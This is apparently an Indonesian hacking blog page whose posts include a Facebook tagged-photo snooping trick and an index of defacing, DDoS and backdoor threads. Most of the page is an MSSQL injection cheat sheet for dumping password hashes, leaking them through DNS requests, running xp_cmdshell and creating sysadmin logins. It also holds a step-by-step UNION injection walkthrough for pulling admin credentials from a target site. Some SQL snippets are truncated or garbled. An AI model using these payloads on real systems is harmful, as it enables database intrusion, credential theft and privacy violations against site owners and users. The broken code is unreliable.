Latest Entries »

Hack Facebook Photos

:: Trick 1 ::

1. Log into facebook account.

2. Find the person’s unique profile ID.

– Search for them and click view friends or send message.

– Write the unique ID from the address bar (only the numbers) or copy it in notepad.

3. Now that you have your unique profile ID you can use the next two links to view a total of 40 tagged photos:

If you wish to see tagged photos added by others use this link:


Firefox CCPB

wah bagi siapa yg mau download firefox terbaru……

firefox ini sudah di lengkapi add-ons bro…
berikut ini yg sudah terpasang di firefox CCPB:



addblock flush
facebook chatbar
java console

kaskus menu
tap progres bar

juga dilengkapi plugin gann….


Oke,thread ini biar mudah mencari thread di bagian HACKING … dalam hal ini gue bagi Tiga Kategori … ok langsung aja ya :

Kategori Hacking website

Hacking For Newbie ( asp forum ) by Man In Black

Download Koneksi.php??? by Flamesofhell

Web Hack Pake Linux By edelweize

Memanfaatkan rapidleech Buat Hacking By Bobihikaru

Ddos online By Bobyhikaru

Yang habis dihajar ma boby nih…By mogsaw newbie

Dork C99 .php By Bobihikaru

kategori Hacking Tips

Beberapa cara yang di pakai hacker handal by bobihikaru

definisi DDOS ama embel2nya

Cara Mudah Nge DEFACE by Man In Black

Google Hacking By Man In Black

Email palsu By Reynold Erwandi

Tampang Hacker Yang Terkenal By oklyn

Cara dan Jenis Hacker Menyerang Situs. By Man In Black

Hack Facebook Photos By Man In Black

Tutor hack warnet Magina Muhardi

account rapid By cah surip

Mengakses Registry dari Comand Prompt By Ichito-Bandito

Manual Send Email dengan Port SMTP By Ijoo

Langkah Sederhana Buat Deface By Man In Black

Newshell In IH By Bobihikaru

Shell Shell By Bobihikaru

BD ( Backdoor ) yang aneh… By SyNTaX ErRoR

Hacking – Hacking shell via FTP By Man In Black

Hack with CMD By ne0 d4rk fl00d3r

[Manfaat Shell]Membuat Socks 5 By dikewel

Cara Membobol Password dan Solusi Menangkalnya By MISTERFRIBO

Apa Ini??? ( ini frame buat menangkal DDOS biasa punya maling sit ) By bl4ck_sh4d0w

simulasi hacking By yudha bubunaro ( game hacking ini )

Tutor Jhon The Ripper By edelweize

Google dorks By Bobihikaru

kategori Hacking Komputer dll

Hack Lift or Elevator By Bobihikaru

Nembak IP dari Jauh ! DDOS By Bobihikaru

Hacking MumSMS Apps For Symbian Mobile ( Tested On Nokia S60) By metropolix

Teknik Hacking Cyber Billing dan Billing Explorer By dedesaputra

untung gue punya back up …. gue stick lagi ahh

SELECT @@version


SELECT 1 — comment
SELECT /*comment*/1

Current User
SELECT user_name();
SELECT system_user;
SELECT user;

SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

List Users
SELECT name FROM master..syslogins

List Password Hashes

SELECT name, password FROM master..sysxlogins — priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;
SELECT name + ‘-‘ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005

List Privileges

List DBA Accounts
SELECT is_srvrolemember(‘sysadmin’); — is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try ‘bulkadmin’, ‘systemadmin’ and other values from the documentation
SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.


Current Database

List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …

List Columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
SELECT, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE AND’sometable'; — list colum names and types for master..sometable

List Tables

SELECT name FROM master..sysobjects WHERE xtype = ‘U'; — use xtype = ‘V’ for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U';
SELECT, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE AND’sometable'; — list colum names and types for master..sometable

Find Tables From Column Name
— NB: This example works only for the current database. If you wan’t to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
SELECT as tablename, as columnname FROM sysobjects JOIN syscolumns ON = WHERE sysobjects.xtype = ‘U’ AND LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’

Select Nth Row
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row

Select Nth Char

SELECT substring(‘abcd’, 3, 1) — returns c

Bitwise AND
SELECT 6 & 2 — returns 2
SELECT 6 & 1 — returns 0

ASCII Value -> Char
SELECT char(0x41) — returns A

Char -> ASCII Value

sELECT ascii(‘A’) – returns 65

SELECT CAST(‘1′ as int);
SELECT CAST(1 as char)

String Concatenation
SELECT ‘A’ + ‘B’ – returns AB

If Statement
IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1

Case Statement
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1

Avoiding Quotes

SELECT char(65)+char(66) — returns AB

Time Delay
WAITFOR DELAY ‘0:0:5′ — pause for 5 seconds

Make DNS Requests

declare @host varchar(800); select @host = name FROM master..syslogins; exec(‘master..xp_getfiledetails ”\\’ + @host + ‘\c$\boot.ini”’); — nonpriv, works on 2000

declare @host varchar(800); select @host = name + ‘-‘ + master.sys.fn_varbintohexstr(password_hash) + ‘’ from sys.sql_logins; exec(‘xp_fileexist ”\\’ + @host + ‘\c$\boot.ini”’); — priv, works on 2005

— NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
— Also check out theDNS tunnel feature of sqlninja

Command Execution

EXEC xp_cmdshell ‘net user'; — priv

On MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:
EXEC sp_configure ‘show advanced options’, 1; — priv
EXEC sp_configure ‘xp_cmdshell’, 1; — priv

Local File Access
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM ‘c:\boot.ini';
DROP TABLE mydata;

Hostname, IP Address


Create Users
EXEC sp_addlogin ‘user’, ‘pass'; — priv


Drop Users
EXEC sp_droplogin ‘user'; — priv

Make User DBA
EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin; — priv

Location of DB files

Default/System Databases


Reference :

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau –
comments: /* atau —
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x


=step Satu:=

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
[site]/berita.php?id=100′ atau

ehingga muncul pesan error seperti berikut (masih bnyak lagi):

=step Dua:=

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by


[site]/berita.php?id=-100+order+by+1– atau

ceklah secara step by step (satupersatu)…



sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–


=step Tiga:=

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi

misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

=step Empat:=

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir


[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables–

seumpama table yang muncul adalah “admin”

=step Lima:=

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi

perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()–

= step Enam: =

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa– >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa–

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E–

=step Tujuh:=

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin–

= step Delapan:=

tahap terakhir mencari halam admin atau login .

Silahkan DI pelajari Kaka 1 .

Cara Buat Spoiler Di WordPress

Tahu spoiler kan? Semacam tombol yang ketika di-klik akan mengeluarkan menu pulldown. Biasanya digunakan untuk menyimpan teks yang terlalu panjang atau semacam lampiran yg sifatnya opsional dilihat atau tidak.
Dapat info dari kaskus tentang bagaimana membuat spoiler. Bisa cek code berikut:


Lihat tulisan yang di-bold. Tulisan “tampilkan” dan code warna CSS bisa diganti sesuai warna themes kita. Bagian yang mau di-hidden di bagian “TEKS YG MAU DIUMPETIN” bisa diisi gambar atau tulisan. Untuk implementasinya sebagai berikut:

Blog at | The Motion Theme.
[ Back to top ]

Get every new post delivered to your Inbox.